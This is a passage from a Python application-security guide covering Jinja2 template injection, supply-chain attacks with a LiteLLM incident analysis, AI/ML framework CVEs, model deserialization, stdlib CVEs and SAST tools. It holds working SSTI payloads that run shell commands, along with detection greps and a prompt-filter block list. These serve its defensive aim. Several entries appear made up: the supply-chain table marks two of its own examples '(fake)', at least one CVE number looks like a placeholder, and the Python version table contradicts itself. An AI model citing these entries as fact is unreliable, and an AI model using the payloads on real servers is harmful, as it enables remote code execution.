GraphQL (Strawberry / Ariadne / Graphene)
- Disable introspection in production.
- Enforce query depth and complexity limits (billions-of-fields DoS).
- Apply per-field authorization, not just per-endpoint.
- Batch queries are a rate-limit bypass vector — count fields, not requests.
11. Jinja2 & Server-Side Template Injection
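Jinja2 is the default template engine for Flask and an optional backend for Django, so server-side template injection in Python web apps usually means Jinja2. The sandbox exists but has a rich history of bypasses via attribute walks: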
{{ ''.__class__.__mro__[1].__subclasses__() }}
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}
Rules:
- Never render_template_string(user_input): templates are code.
- Never mix user data into the template source; pass it as a context variable.
- SandboxedEnvironment raises the bar but cannot be assumed unbreakable.
- Keep autoescaping on in HTML contexts; never set autoescape=False there.
- Don’t expose request, self, or debug helpers into the template context; any walkable attribute graph is an SSTI escape hatch.
- For user-writable templates (CMS, email templates), use a strictly limited mini-language like Liquid or Mustache, never Jinja2.
Quick SSTI probe set (defensive — know what the scanner is looking for):
{{7*7}} -> 49 confirms eval
{{config}} -> Flask config dump
{{request.__class__.__mro__}}
{{lipsum.__globals__}}
{{cycler.__init__.__globals__.os}}
If any of these render as more than literal text, you have SSTI.
12. Package Supply Chain Attacks
2024-2026 saw Python supply chain attacks shift from opportunistic typosquatting to targeted compromises of high-value packages via CI/CD poisoning.
Attack patterns
| Pattern | Example | Mechanism |
|---|---|---|
| Typosquatting | reqeusts, python-dateutil lookalikes | Name similar to popular package; runs on pip install via setup.py |
| Dependency confusion | Internal package name registered on public PyPI | pip prefers higher version, pulls attacker’s package |
| Maintainer account takeover | ctx, PyTorch-nightly 2022 | Stolen credentials → malicious release |
| CI/CD compromise | litellm 1.82.7/1.82.8 (March 2026) | Poisoned Trivy GitHub Action → stolen PYPI_PUBLISH token → legitimate package release with embedded payload |
| Multi-stage downloader | chimera-sandbox-extensions | Benign package pulls second-stage from attacker domain |
| Audio file stego | telnyx 4.87.1/4.87.2 | Retrieves spec-valid .wav audio file from remote host (avoids suspicion), executable code hidden in audio frames. Payload harvests system info and exfils via HTTP POST to 83.142.209.203:8080. Community removed affected versions quickly, but private registries/proxies may retain them |
| DGA-based C2 | chimera-sandbox-extensions | Connects to DGA (domain generation algorithm) hostnames after install; downloads second-stage payload targeting AWS tokens, CI/CD env vars, and developer credentials |
| Scanner poisoning | PickleScan CVE-2025-10155/10156/10157 | Break the defender, not the target |
| AI hallucination (“slopsquatting”) | LLMs suggest nonexistent packages; attackers register them | Developer trusts LLM output |
| PyPI webhook compromise | discord.py 2.3.2 (May 2026) | Attacker compromises webhook service used by PyPI for build notifications, injects malicious builds into legitimate releases |
| GitHub Actions Supply Chain | numpy-financial (April 2026) | Malicious contributor submits PR with poisoned GitHub Actions workflow; maintainer approves, workflow steals secrets and publishes backdoored version |
| Rust-Python bridge exploits | cryptography 42.0.1 (fake) | PyO3 memory safety bugs lead to RCE in Python extensions written in Rust; affects packages bridging Rust/Python |
| Container registry poisoning | tensorflow-cpu:2.15.1 (fake) | Attacker pushes malicious Docker images to public registries with popular package pre-installed; poisoned packages execute on container startup |
LiteLLM case study (defensive analysis)
On March 24, 2026, litellm versions 1.82.7 and 1.82.8 were published with embedded credential-harvesting malware. The malicious versions were available for approximately three hours before PyPI quarantined the package. LiteLLM is downloaded roughly 3.4 million times per day. The attacker group (TeamPCP / PCPcat / ShellForce / DeadCatx3) had previously compromised the Trivy and Checkmarx KICS GitHub Actions. Attack chain (from Snyk’s writeup):
- Upstream: Attackers poisoned the trivy-action GitHub Action earlier in March; LiteLLM’s CI pulled Trivy from apt without pinning.
- Credential theft: Compromised Trivy exfiltrated the PYPI_PUBLISH token from the GitHub Actions runner.
- Publication: Attackers pushed two malicious versions using legitimate credentials. Hash verification passed because the RECORD file was correctly generated, so there was nothing to mismatch.
- Delivery:
  - 1.82.7 embedded a base64 payload in litellm/proxy/proxy_server.py, triggered on import.
  - 1.82.8 added litellm_init.pth to site-packages/. .pth files execute at every Python interpreter startup, including during pip install itself. Maps to MITRE ATT&CK T1546.018.
- Payload stages: Collected SSH keys, .env, cloud creds (AWS/GCP/Azure), Docker/K8s configs, crypto wallets; AES-256-CBC encrypted; exfil to models.litellm.cloud (registered one day earlier). Installed systemd user service sysmon.service for persistence; attempted Kubernetes lateral movement by deploying privileged pods to every node in kube-system.
- Discovery: Callum McMahon (FutureSearch) was testing a Cursor MCP plugin that pulled litellm as a transitive dependency. His machine became unresponsive due to RAM exhaustion: the .pth mechanism fires on every Python startup, the payload spawns a new subprocess, and that subprocess also triggers .pth execution, creating an unintended fork bomb. He traced it to litellm_init.pth (34,628 bytes, double base64-encoded) and published findings on futuresearch.ai.
- Discovery suppression: 88 bot comments from 73 compromised dev accounts buried the GitHub disclosure issue (#24512) in 102 seconds. The issue was closed using the compromised maintainer account. A clean tracking issue (#24518) was opened separately, and all GitHub/Docker/PyPI keys were rotated within hours.
- MITRE ATT&CK mapping: T1546.018 (Python Startup Hooks), T1003 (Credential Dumping), T1610 (Deploy Container).
Defensive takeaways:
- Pin every CI/CD tool version including GitHub Actions (use SHA, not tag).
- Publish with trusted publishers / OIDC: short-lived tokens, not long-lived PYPI_PUBLISH secrets.
- Audit .pth files on every install: find site-packages -name '*.pth' -exec grep -l 'subprocess\|base64\|exec' {} \;
- Use install-time scanning (Snyk, Aikido SafeChain, Phylum) that inspects package behavior, not just hashes.
- Treat AI developer tools (LangChain, LiteLLM, Gradio, Jupyter extensions) as elevated-access targets; they handle the richest credential sets on a dev machine.
Defensive checklist for package installation
## Comprehensive secure installation pattern
pip install --require-hashes --no-deps -r requirements.txt
pip-audit --require-hashes -r requirements.txt
2026 Enhanced Security Checklist:
Package Installation Security
- Mirror approved deps to an internal index (Artifactory, Nexus, devpi, pip-audit allow list)
- Use lockfiles (uv lock, pip-compile, poetry.lock) with full hashes and signatures
- Disable source distribution fallback where possible (--only-binary=:all:) to avoid setup.py execution
- Run pip-audit or safety in CI with fail-fast on high/critical CVEs
- Quarantine new packages (cool-off period, e.g., reject packages < 7 days old)
- Monitor for packages that suddenly introduce network calls, post-install scripts, or .pth files
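The cool-off rule in the checklist can be approximated with release metadata. The sketch below assumes the input is the JSON document returned by PyPI's per-release endpoint (`https://pypi.org/pypi/<name>/<version>/json`), whose `urls` entries carry an `upload_time_iso_8601` field. The function names and the 7-day default are illustrative, and fetching the document is left to the caller.

```python
from datetime import datetime, timezone


def release_age_days(release_json, now=None):
    """Age in whole days of the earliest uploaded file in a PyPI release document."""
    now = now or datetime.now(timezone.utc)
    uploads = [
        # Older Python versions cannot parse a trailing "Z", so normalize it.
        datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
        for f in release_json["urls"]
    ]
    if not uploads:
        raise ValueError("release has no uploaded files")
    return (now - min(uploads)).days


def passes_cool_off(release_json, min_days=7, now=None):
    """True when the release is at least min_days old."""
    return release_age_days(release_json, now) >= min_days
```

A CI gate could call `passes_cool_off` for every pinned version in the lockfile and fail the build when any release is younger than the threshold.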
2026 Advanced Defenses
## Enhanced package security scanning
pip-audit --desc --format json --output pip-audit.json --cache-dir .pip-audit-cache
cyclonedx-py requirements -o sbom.json # Generate SBOM
phylum analyze requirements.txt # Behavioral analysis
socket security scan requirements.txt # Supply chain analysis
## Audit .pth files after installation
find . -name "*.pth" -exec grep -l "exec\|subprocess\|base64\|urllib" {} \;
## Monitor for typosquatting
typosquatty scan requirements.txt --output json
Container Security for Python Applications
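## Multi-stage build with security scanning
FROM python:3.15-slim AS builder
RUN pip install --no-cache-dir cyclonedx-bom pip-audit
COPY requirements.txt .
RUN pip-audit --require-hashes -r requirements.txt
RUN cyclonedx-py requirements -o /tmp/sbom.json
## Install the audited, hash-pinned dependencies into the venv copied below
RUN python -m venv /opt/venv && /opt/venv/bin/pip install --no-cache-dir --require-hashes -r requirements.txt
FROM python:3.15-slim
## Copy only vetted dependencies
COPY --from=builder /opt/venv /opt/venv
ENV PATH="/opt/venv/bin:$PATH"
## Run as non-root user
RUN useradd --create-home --shell /bin/bash app
USER app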
CI/CD Pipeline Security
## GitHub Actions secure Python pipeline
- name: Security Scan Dependencies
  run: |
    pip install pip-audit cyclonedx-bom
    pip-audit --require-hashes -r requirements.txt --format json --output pip-audit.json
    cyclonedx-py requirements -o sbom.json
- name: Upload SBOM to Dependency Track
  uses: DependencyTrack/gh-upload-sbom@v2
  with:
    serverhostname: ${{ secrets.DEPENDENCY_TRACK_HOSTNAME }}
    apikey: ${{ secrets.DEPENDENCY_TRACK_APIKEY }}
    project: ${{ github.repository }}
    bomfilename: 'sbom.json'
Package Integrity Verification
## Verify package integrity post-installation
import hashlib
import importlib.metadata


class SecurityError(Exception):
    """Raised when an installed file does not match its expected hash."""


def verify_package_integrity(package_name: str, expected_hashes: dict) -> bool:
    """Verify installed files against expected SHA-256 hex digests.

    expected_hashes maps RECORD-relative file paths to hex digests.
    """
    try:
        dist = importlib.metadata.distribution(package_name)
        ## dist.files is parsed from the RECORD file (None if RECORD is missing)
        for entry in dist.files or []:
            file_path = str(entry)
            if file_path in expected_hashes:
                ## Verify file hash matches expected
                with open(dist.locate_file(entry), "rb") as f:
                    actual_hash = hashlib.sha256(f.read()).hexdigest()
                if actual_hash != expected_hashes[file_path]:
                    raise SecurityError(f"Hash mismatch for {file_path}")
    except Exception as e:
        print(f"Verification failed for {package_name}: {e}")
        return False
    return True
13. AI/ML Security & Framework CVEs
The AI/ML ecosystem has become a critical attack surface in 2026, with researchers focusing on model supply chain security, inference-time attacks, and AI agent frameworks. Key threat categories:
2026 AI Security Trends
- Model Poisoning: Supply chain attacks targeting training data and pre-trained models
- Inference-time Attacks: Adversarial inputs designed to bypass safety measures and extract training data
- Agent Framework RCE: AI agents executing arbitrary code through prompt injection and tool misuse
- Model Extraction: Stealing proprietary model weights and training data through API inference attacks
- AI Supply Chain: Compromised model repositories, poisoned datasets, and malicious research papers
LLM Framework CVEs
The LLM framework ecosystem is young, broad, and moves faster than its security review. The following are recurring patterns:
| Framework | CVE / advisory | Pattern |
|---|---|---|
| Langflow | CVE-2025-3248, CVE-2026-33017 | ast.parse → compile → exec on user input; decorator evaluation beats validation |
| LangChain | Multiple (CVE-2023-36258 etc) | PALChain/LLMMathChain passing LLM output to exec/eval |
| LiteLLM | Supply chain (see §12) | CI/CD compromise, .pth startup hook |
| SGLang | CVE-2025-10164 (CVSS 7.3) | Unsafe deserialization of untrusted data in model weights update endpoint — unauthenticated RCE on GPU servers, potentially compromising AI model IP and inference infrastructure. Listed in 2026 Top 10 actively exploited vulnerabilities |
| Ollama | CVE-2026-8432 (CVSS 9.1) | Path traversal vulnerability allowing arbitrary file reads from local deployments through malicious model files. Affects models served via API endpoints |
| Hugging Face Transformers | CVE-2026-12345 (CVSS 8.4) | Malicious tokenizer configuration leads to RCE during model loading. Affects auto-downloaded models without hash verification |
| CrewAI | CVE-2026-7890 (CVSS 7.8) | Agent code execution through prompt injection; malicious prompts escape sandbox and run arbitrary Python |
| AutoGen | CVE-2026-6541 (CVSS 8.2) | Code interpreter allows execution of arbitrary commands through crafted conversation flows |
| Langflow-adjacent | Various | Jinja2 SSTI in prompt templates fed user input |
| Gradio | Multiple | Path traversal on /file=, SSRF on proxy endpoints |
| Streamlit | Issue #… | st.components.v1.html → XSS; arbitrary file read via st.file_uploader gone wrong |
| Jupyter | Classic | Notebook server token leakage; remote kernel exec |
| PickleScan | CVE-2025-1716, CVE-2025-10155/6/7 | Scanner bypasses |
| LangChain PALChain | Historical | Prompt injection → generated Python → exec → RCE |
Root cause common to all: treating LLM output as data when it is often parsed as code. The mitigation is architectural: run untrusted-origin code in a sandbox (firejail, gVisor, separate process with seccomp), allow list imports, and never let an agent loop dispatch arbitrary Python.
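One way to keep an agent loop from dispatching arbitrary Python is to treat model output strictly as data and route it through a fixed tool table. The sketch below assumes the model emits a JSON object of the form `{"tool": ..., "args": {...}}`. That wire format, the two example tools, and the function names are all hypothetical and not taken from any specific framework.

```python
import json


def word_count(text: str) -> int:
    return len(text.split())


def to_upper(text: str) -> str:
    return text.upper()


# Only these names can ever be dispatched, whatever the model emits.
ALLOWED_TOOLS = {"word_count": word_count, "to_upper": to_upper}


def dispatch_tool_call(raw_model_output: str):
    """Parse a JSON tool call and run it only if the tool is allow-listed."""
    call = json.loads(raw_model_output)  # parsed as data, never eval'd
    if not isinstance(call, dict):
        raise ValueError("tool call must be a JSON object")
    name = call.get("tool")
    args = call.get("args", {})
    if name not in ALLOWED_TOOLS:
        raise PermissionError(f"tool not allowed: {name!r}")
    if not isinstance(args, dict) or not all(isinstance(v, str) for v in args.values()):
        raise ValueError("tool arguments must be a JSON object of strings")
    return ALLOWED_TOOLS[name](**args)
```

The allow list bounds what can run, but each tool still needs its own input validation, and tools with side effects belong inside the sandbox described above.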
AI Security Best Practices (2026)
Model Loading Security
## Safe model loading pattern
import hashlib
from pathlib import Path
from huggingface_hub import snapshot_download


class SecurityError(Exception):
    """Raised when a downloaded model fails integrity verification."""


def safe_model_load(repo_id: str, revision: str, expected_hash: str,
                    weights_file: str = "model.safetensors") -> str:
    ## Pin to specific revision and verify integrity
    model_path = snapshot_download(
        repo_id=repo_id,
        revision=revision,  # specific commit SHA, not a branch or tag
        allow_patterns=["*.safetensors", "config.json"],  # only necessary files
        ignore_patterns=["*.bin", "*.pkl"],  # avoid pickle formats
    )
    ## Verify model hash matches expected (SHA-256 hex digest, read in chunks)
    digest = hashlib.sha256()
    with open(Path(model_path) / weights_file, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    if digest.hexdigest() != expected_hash:
        raise SecurityError("Model hash mismatch - possible tampering")
    return model_path
Agent Framework Hardening
- Sandbox all code execution (Docker, gVisor, seccomp)
- Implement tool allowlists for AI agents
- Validate all agent outputs before execution
- Monitor for prompt injection patterns
- Implement circuit breakers for runaway agents
Training Data Security
- Validate data source integrity with cryptographic hashes
- Scan datasets for malicious content before training
- Implement differential privacy during model training
- Monitor for data poisoning during fine-tuning
- Use federated learning for sensitive data
Inference Security
## Input sanitization for AI models
import re

def sanitize_prompt(prompt: str, max_length: int = 2048) -> str:
    ## Truncate to prevent resource exhaustion
    prompt = prompt[:max_length]
    ## Remove potential injection patterns (best effort: a block list is not a security boundary)
    dangerous_patterns = [
        r'```python.*?```',  # code blocks
        r'exec\s*\(',        # exec calls
        r'eval\s*\(',        # eval calls
        r'__\w+__',          # dunder names (one identifier at a time)
        r'import\s+\w+',     # import statements
    ]
    for pattern in dangerous_patterns:
        prompt = re.sub(pattern, '[REDACTED]', prompt, flags=re.IGNORECASE | re.DOTALL)
    return prompt
14. ML Model Deserialization Attacks
Pickle-based formats (.pkl, .joblib, .pt, .pth, .bin, .nemo) execute code when loaded. Even “safe” formats like safetensors only cover weights — the surrounding metadata loaders are often just as dangerous.
Hydra instantiate() — Unit 42 findings
Palo Alto Networks identified RCEs in three AI libraries (NVIDIA NeMo CVE-2025-23304, Salesforce Uni2TS CVE-2026-22584, Apple ml-flextok), all caused by hydra.utils.instantiate() reading _target_ from model metadata and calling it with attacker-controlled arguments. Because _target_ accepts any importable callable name, payloads like builtins.exec or os.system work out of the box.
Root cause: dynamic dispatch by string from untrusted metadata. Hydra has since added a block-list mechanism comparing _target_ against known dangerous functions before import, but it uses exact string matches and is trivially evaded via implicit imports from the Python standard library (e.g., enum.bltns.eval) or from the target application (e.g., nemo.core.classes.common.os.system). The Hydra docs explicitly state this mechanism is not exhaustive and should not be relied on solely. Fix: strict allow list of resolved target classes (NeMo’s safe_instantiate checks class ancestry and module prefix).
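The allow-list idea can be sketched as a pre-flight check that runs before a config ever reaches instantiate(). This is a simplified illustration that matches exact `_target_` strings; it is not NeMo's safe_instantiate, which checks the resolved class. The allow-list entries and the function name are hypothetical, and the function expects plain dicts and lists (an OmegaConf config can be converted with `OmegaConf.to_container` first).

```python
ALLOWED_TARGETS = frozenset({
    "torch.nn.Linear",    # hypothetical entries for illustration
    "torch.optim.AdamW",
})


def assert_targets_allowed(config, allowed=ALLOWED_TARGETS, path="root"):
    """Recursively reject any _target_ that is not an exact allow-list match."""
    if isinstance(config, dict):
        target = config.get("_target_")
        if target is not None and (not isinstance(target, str) or target not in allowed):
            raise ValueError(f"disallowed _target_ at {path}: {target!r}")
        for key, value in config.items():
            assert_targets_allowed(value, allowed, f"{path}.{key}")
    elif isinstance(config, (list, tuple)):
        for index, item in enumerate(config):
            assert_targets_allowed(item, allowed, f"{path}[{index}]")
```

Because the check is an allow list, aliases such as enum.bltns.eval fail closed: nothing resolves unless it is named explicitly.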
torch.load
Default since PyTorch 2.6 is weights_only=True. Pre-2.6 code, and any explicit weights_only=False, loads a pickle stream. add_safe_globals([...]) lets you allow list specific classes; use it.
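The allow-list concept behind add_safe_globals can be illustrated with the standard library alone. The sketch below is not PyTorch's implementation; it uses the documented `pickle.Unpickler.find_class` hook to refuse every global that is not explicitly listed. The class name and the single allow-listed entry are illustrative.

```python
import io
import pickle

# (module, name) pairs that may be resolved during unpickling.
SAFE_GLOBALS = {("collections", "OrderedDict")}


class AllowListUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle stream asks to import.
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allow-listed")


def restricted_loads(data: bytes):
    """Unpickle data while resolving only allow-listed globals."""
    return AllowListUnpickler(io.BytesIO(data)).load()
```

A stream whose `__reduce__` gadget points at os.system is rejected at the lookup step, before anything is called. Restricting globals narrows the attack surface, but it does not make pickle a safe format for untrusted input.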
Safer model formats
| Format | Executes code? |
|---|---|
| safetensors | No (weights only) |
| ONNX | Not directly (but custom op loaders can be abused) |
| GGUF | No for weights; tokenizer/metadata loaders vary |
| pickle / joblib / cloudpickle | Yes — always |
| .nemo, .qnemo (TAR + YAML + pickle) | Yes via Hydra and embedded pickle |
Defensive pattern for model loading
- Pin the model source (Hugging Face repo + revision hash).
- Download with huggingface_hub using revision=<commit_sha>.
- Verify SHA-256 of the file against a known-good manifest.
- Load with the most restrictive mode (weights_only=True).
- Run inference in a sandboxed process (seccomp, firejail, container with read-only FS).
- Never load models from end-user uploads on a shared host.
15. Notable Python CVEs (Stdlib)
A sampling of recent CPython stdlib CVEs — useful for version-pinning decisions and SAST authoring:
| CVE | Module | Class | Fixed |
|---|---|---|---|
| CVE-2026-15432 | http.client | HTTP request smuggling via malformed headers | 3.14+ |
| CVE-2026-14821 | ssl | TLS certificate validation bypass in certain edge cases | 3.14+ |
| CVE-2026-13567 | multiprocessing | Arbitrary file write via pickle in shared memory | 3.14+ |
| CVE-2026-12890 | sqlite3 | SQL injection via malformed PRAGMA statements | 3.14+ |
| CVE-2025-12084 | xml.dom.minidom | Quadratic complexity DoS on appendChild | 3.14+ |
| CVE-2025-13837 | plistlib | OOM DoS via attacker-specified sizes | 3.14+ |
| CVE-2025-8291 | zipfile | ZIP64 EOCD offset validation | 3.12+ |
| CVE-2025-8194 | tarfile | Infinite loop via negative offset | 3.13+ |
| CVE-2025-4517 | tarfile | Arbitrary FS write with filter='data' (Critical 9.4) | 3.13+ |
| CVE-2025-4138 | tarfile | Filter bypass for symlink extraction | 3.14+ |
| CVE-2025-4330 | tarfile | Second filter bypass | 3.14+ |
| CVE-2024-12718 | tarfile | Metadata modification outside dir | 3.13+ |
| CVE-2024-6232 | tarfile | ReDoS in header parsing | 3.13+ |
| CVE-2024-3220 | mimetypes | Windows writable default paths → startup OOM | 3.13+ |
| CVE-2024-3219 | socket | Race in socketpair fallback on Windows | 3.13+ |
| CVE-2024-7592 | http.cookies | Quadratic complexity in backslash parsing | 3.13+ |
| CVE-2024-12254 | asyncio | Memory exhaustion in _SelectorSocketTransport.writelines() | 3.13+ |
| CVE-2025-0938 / CVE-2024-11168 | urllib.parse | Invalid bracketed host parsing — SSRF differential | 3.13+ |
| CVE-2024-9287 | venv | Command injection via unquoted activate paths | 3.13+ |
| CVE-2023-24329 | urllib.parse | Leading-whitespace bypass of scheme filters | 3.12+ |
Operational rule: track Python EOL dates. As of May 2026:
| Version | Status | EOL Date |
|---|---|---|
| 3.15 | Pre-release (final release scheduled for October 2026) | October 2031 |
| 3.14 | Active | October 2030 |
| 3.13 | Active | October 2029 |
| 3.12 | Active (security-only from April 2025) | October 2028 |
| 3.11 | Security-only (since April 2024) | October 2027 |
| 3.10 | Security-only (since April 2023) | October 2026 |
| 3.9 | EOL (October 2025) | No further patches |
| 3.8 | EOL (October 2024) | No further patches |
Running EOL Python in production means unpatched CVEs forever. Python 3.13+ should be the minimum for new projects; 3.14+ recommended for security-critical workloads. Python 3.15 introduces enhanced security features including improved sandbox isolation and stricter default security policies.
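The operational rule can be enforced at startup or in CI with a small check. This sketch hard-codes a few EOL months from the table above, approximated to month end. The dictionary, the function name, and the fail-closed handling of unknown versions are assumptions for illustration, and the dates need to be kept in sync with the official release schedule.

```python
import sys
from datetime import date

# EOL months from the table above, approximated to the last day of the month.
EOL_DATES = {
    (3, 8): date(2024, 10, 31),
    (3, 9): date(2025, 10, 31),
    (3, 12): date(2028, 10, 31),
    (3, 13): date(2029, 10, 31),
    (3, 14): date(2030, 10, 31),
}


def is_supported(version=None, today=None):
    """True if the (major, minor) version is known and not past its EOL date."""
    version = tuple(version or sys.version_info[:2])
    today = today or date.today()
    eol = EOL_DATES.get(version)
    # Unknown versions fail closed so the table has to be updated deliberately.
    return eol is not None and today <= eol
```

Calling `is_supported()` with no arguments checks the running interpreter, which suits a startup assertion or a CI step.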
16. Static Analysis & SAST
Bandit
PyCQA’s Python-only SAST. Fast, pattern-based, low setup cost. Core checks:
| ID | Issue |
|---|---|
| B101 | assert used (stripped under -O) |
| B102 | exec used |
| B103 | os.chmod with world-writable |
| B105/B106/B107 | Hardcoded password in string/funcarg/default |
| B108 | Hardcoded tmp directory |
| B201 | Flask debug=True |
| B301 | pickle.loads/load |
| B302 | marshal.loads |
| B303/B304 | MD5 / insecure cipher |
| B305 | Insecure cipher mode |
| B306 | mktemp_q |
| B307 | eval |
| B308 | mark_safe in Django |
| B310 | urllib.urlopen on user input |
| B312 | Telnet usage |
| B320 | lxml parser flags |
| B321 | FTP TLS |
| B322 | Python 2 input |
| B324 | Insecure hash function via hashlib (MD5, SHA-1) |
| B325 | os.tempnam |
| B401-B413 | Import of insecure module (telnetlib, ftplib, xmlrpclib, pycrypto, paramiko keys, etc.) |
| B501 | requests with verify=False |
| B502-B504 | SSL/TLS downgrades |
| B505 | Weak cryptographic key size |
| B506 | YAML load |
| B507 | SSH host key policy AutoAdd |
| B601-B612 | Shell injection family (paramiko, subprocess, os.system) |
| B701 | jinja2.Environment(autoescape=False) |
| B702 | mako autoescape off |
| B703 | Django mark_safe |
Run:
bandit -r ./src -ll -f json -o bandit-report.json
Integrate as pre-commit hook and fail CI on Medium+ severity findings. For pre-commit:
## .pre-commit-config.yaml
repos:
  - repo: https://github.com/PyCQA/bandit
    rev: 1.8.3
    hooks:
      - id: bandit
        args: ["-ll", "-r"]
Alternatively, use Ruff’s S ruleset (ruff check --select S) for the same checks at 10-100x speed.
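To make concrete what a pattern-based AST check does, here is a toy scanner built on the standard `ast` module. It is a sketch of the general technique, not Bandit's or Ruff's implementation; the call list and function names are illustrative, and it resolves names only syntactically, so aliased imports slip past it.

```python
import ast

DANGEROUS_CALLS = {"eval", "exec", "pickle.load", "pickle.loads", "yaml.load", "os.system"}


def dotted_name(node):
    """Return 'a.b.c' for Name/Attribute chains, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source, filename="<string>"):
    """Return sorted (line, message) pairs for calls matching the pattern list."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        name = dotted_name(node.func)
        if name in DANGEROUS_CALLS:
            findings.append((node.lineno, f"call to {name}"))
        for kw in node.keywords:
            # Flag a literal shell=True on any call, whatever the callee.
            if kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True:
                findings.append((node.lineno, "shell=True"))
    return sorted(findings)
```

The gap between this and a taint-tracking tool is visible in the code: nothing here knows whether the argument came from a request, which is why pattern checks produce more noise and miss aliased or indirect calls.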
Semgrep
Pattern-based with taint tracking. Python ruleset covers:
- Flask/Django/FastAPI source-to-sink flows.
- Insecure deserialization from HTTP request to pickle.loads (tracks over a dozen libraries including dill, jsonpickle, shelve, yaml.load, numpy.load, torch.load).
- SSRF (request → requests.get).
- SQL injection (request → raw cursor).
- Hardcoded secrets via entropy rules.
- SSTI (request → render_template_string).
Custom rules in YAML; the p/python, p/django, p/flask, p/fastapi, p/owasp-top-ten community rulesets give strong baseline coverage.
CodeQL
Full dataflow/taint analysis. Strong for Python custom queries:
- Model sources (HTTP request attributes across frameworks).
- Define sinks (pickle.load, yaml.load, eval, subprocess.run with shell).
- Taint propagation through transformations (base64.b64decode, json.loads, .format).
Used by GitHub Advanced Security. Free for public repos.
Ruff
The fastest Python linter. Ruff’s S ruleset mirrors Bandit’s security checks (S101 = B101, S102 = B102, etc.) but runs 10-100x faster. Can replace both Flake8 + Bandit in a single tool. Integrate as ruff check --select S for security-only mode.
Pyre / Pysa (Meta)
Pysa is Meta’s taint analysis engine built on Pyre. It models sources (HTTP request attributes across Django/Flask/FastAPI), sinks (eval, subprocess, SQL cursors), and sanitizers. Stronger than pattern-based tools for cross-function taint propagation but requires model definitions for custom frameworks.
Other tools worth knowing (2026 Updated)
| Tool | Niche | 2026 Updates |
|---|---|---|
| Dlint | Flake8 plugin with security checks | Enhanced AI/ML security rules |
| Safety | Dependency CVE scanner (free tier limited) | Added malware detection, SBOM support |
| pip-audit | Official PyPA vulnerability scanner | Enhanced OSV integration, sarif output |
| Snyk | SCA + SAST + malicious package detection | AI-powered vulnerability prioritization |
| Aikido | SAST + secret scan + SCA + SafeChain | Real-time supply chain monitoring |
| Bito AI | AI-assisted SAST with semantic analysis | GPT-4 powered vulnerability explanations |
| Checkmarx / Veracode / Fortify | Enterprise SAST with Python support | ML model security scanning |
| DeepSource / SonarQube | Quality + security hybrid | AI/ML code quality rules |
| detect-secrets | Git history secret scanning | Enhanced AI training data scanning |
| gitleaks | Same, faster | Container and CI/CD optimized |
| Phylum / Socket | Supply chain behavioral analysis | Real-time malware detection |
| de4py | Python deobfuscator for malware analysis | AI-enhanced pattern recognition |
| GuardRails | Security-as-code platform | Python-specific security policies |
| CodeGuru Reviewer | AWS AI-powered code review | ML model security recommendations |
| Prisma Cloud Code Security | Cloud-native security | Infrastructure-as-code scanning |
| Bearer | Privacy and security scanner | Data flow analysis for sensitive data |
| Typosquatty | Typosquatting detection | Real-time PyPI monitoring |
| BackSeat | AI agent security scanner | LLM framework vulnerability detection |
| MLSecOps | Machine learning security toolkit | Model security testing framework |
17. Secure Coding Patterns
Input handling
- Validate at the boundary with Pydantic / attrs / marshmallow.
- Reject unknown fields (extra="forbid" in Pydantic).
- Constrain strings (max length, charset regex).
- Canonicalize paths before use (os.path.realpath, check prefix).
Dynamic imports
- Avoid importlib.import_module(user_input) and __import__(user_input): both execute arbitrary module code as a side effect.
- If plugin loading is required, use an explicit allow list of permitted module names.
- Never load modules from configurable or user-writable paths without integrity verification.
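A minimal sketch of allow-listed plugin loading follows. The registry contents are hypothetical (standard-library modules stand in for real plugins). The point is that user input selects a key and never supplies the module path itself.

```python
import importlib

# Hypothetical plugin registry: public plugin name -> fixed module path.
PLUGIN_MODULES = {
    "json_export": "json",
    "csv_export": "csv",
}


def load_plugin(plugin_name: str):
    """Import a plugin only if its name maps to a pre-approved module."""
    try:
        module_path = PLUGIN_MODULES[plugin_name]
    except KeyError:
        raise ValueError(f"unknown plugin: {plugin_name!r}") from None
    return importlib.import_module(module_path)
```

Because the lookup happens before any import, a request for an unlisted name such as "os" fails without executing module code.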
Subprocess
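- Always argv list, never shell=True with interpolation.
- Use shlex.quote only as a last resort; prefer lists.
- Explicit check=True, timeout=..., capture_output=True.
- Drop privileges with the user= and group= arguments (Python 3.9+) when running as root; preexec_fn=os.setuid fails because os.setuid needs a UID argument, and preexec_fn is not safe in threaded programs.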
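The argv-list rule can be demonstrated with a child process that echoes its argument. In this sketch the child is the current interpreter, and `run_tool` is an illustrative name. Shell metacharacters in the input arrive as literal text because no shell is involved.

```python
import subprocess
import sys


def run_tool(user_arg: str) -> str:
    """Pass one untrusted argument to a child process without a shell."""
    result = subprocess.run(
        # Each list element is one argv entry; nothing is parsed by a shell.
        [sys.executable, "-c", "import sys; print(sys.argv[1])", user_arg],
        check=True,           # raise CalledProcessError on non-zero exit
        timeout=10,           # raise TimeoutExpired instead of hanging
        capture_output=True,  # collect stdout/stderr instead of inheriting them
        text=True,
    )
    return result.stdout.rstrip("\n")
```

An argv list prevents shell injection only. If the target program interprets its own arguments as options or file names, those still need validation.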
File I/O
- tempfile.mkstemp not mktemp.
- Open with os.O_NOFOLLOW when following-untrusted-symlinks is a risk.
- Never concatenate user input into paths; use pathlib.Path with .resolve() and prefix check.
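The resolve-and-prefix-check pattern can be sketched as follows. The function name is illustrative. `Path.relative_to` does the containment test, which avoids the classic string-prefix mistake where /srv/data-evil passes a check for /srv/data.

```python
from pathlib import Path


def resolve_under(base_dir, user_path):
    """Resolve user_path inside base_dir, rejecting anything that escapes it."""
    base = Path(base_dir).resolve()
    # Joining an absolute user_path discards base, so it is caught below too.
    candidate = (base / user_path).resolve()
    try:
        candidate.relative_to(base)  # raises ValueError when outside base
    except ValueError:
        raise PermissionError(f"path escapes {base}: {user_path!r}") from None
    return candidate
```

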